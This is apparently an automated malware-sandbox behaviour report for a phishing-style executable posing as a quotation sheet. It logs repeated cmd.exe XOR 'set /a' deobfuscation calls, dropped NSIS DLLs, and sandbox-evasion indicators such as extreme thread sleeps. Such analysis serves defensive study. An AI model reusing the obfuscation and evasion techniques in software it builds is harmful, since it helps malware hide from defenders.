            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 0_2_10001A5D
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 0_2_10002D20 push eax; ret 0_2_10002D4E
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_0016B4ED pushfd ; iretd 131_2_0016B4F2
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37DD00FA pushad ; retf 131_2_37DD00FB
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37DEB9FA pushad ; retf 131_2_37DEB9FF
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37DEB91B pushad ; retf 131_2_37DEB926
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_37DEA65F push esp; ret 131_2_37DEA68D
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | File created: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | File created: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\nsExec.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | API/Special instruction interceptor: Address: 26A4F38
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Memory allocated: 120000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Memory allocated: 34CB0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Memory allocated: 36CB0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Thread delayed: delay time: 600000
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\nsExec.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | API coverage: 2.5 %
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe TID: 5680 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe TID: 5680 | Thread sleep time: -600000s >= -30000s
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 0_2_00406167 FindFirstFileA,FindClose, 0_2_00406167
